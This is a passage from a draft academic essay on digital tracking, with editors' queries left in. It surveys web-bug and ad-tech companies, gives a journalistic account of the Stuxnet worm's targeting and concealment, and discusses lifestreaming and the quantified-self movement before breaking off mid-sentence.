&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for 